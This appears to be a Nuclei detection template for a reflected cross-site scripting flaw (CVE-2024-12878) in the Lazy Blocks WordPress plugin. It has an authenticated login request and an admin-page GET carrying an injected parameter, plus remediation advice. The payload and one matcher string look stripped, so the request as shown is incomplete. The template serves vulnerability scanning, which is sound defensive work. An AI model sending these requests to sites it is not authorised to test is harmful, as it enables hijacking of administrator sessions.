id: CVE-2024-12878 info: name: Lazy Blocks <= 3.8.2 - Cross-Site Scripting author: Shivam Kamboj severity: medium description: | Custom Block Builder WordPress plugin < 3.8.3 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before output, letting attackers execute malicious scripts in high privilege users' browsers, exploit requires victim to load malicious page. impact: | Attackers can execute malicious scripts in high privilege users' browsers, potentially leading to session hijacking or account compromise. remediation: | Update to version 3.8.3 or later. reference: - https://wpscan.com/vulnerability/827444d1-87cb-4057-827a-d802eac82cf8/ - https://nvd.nist.gov/vuln/detail/CVE-2024-12878 metadata: verified: true max-request: 2 tags: cve,cve2024,wordpress,wp,wp-plugin,lazy-blocks,xss,reflected,authenticated flow: http(1) && http(2) http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In matchers: - type: dsl dsl: - 'contains(header, "wordpress_logged_in")' - 'status_code == 302' condition: and internal: true - raw: - | GET /wp-admin/edit.php?post_type=lazyblocks&">=1" HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains_all(body, "", "edit-lazyblocks", "lazyblocks")' - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and # digest: 4a0a00473045022100d35978956ec3d62cfac747bf24f53aa063cae11a90f857b4c8bbf7e51f8d2db10220145932abaa8704bc120d90a1d8792612f04388636564ecf99a274daba50df1cb:922c64590222798bb761d5b6d8e72950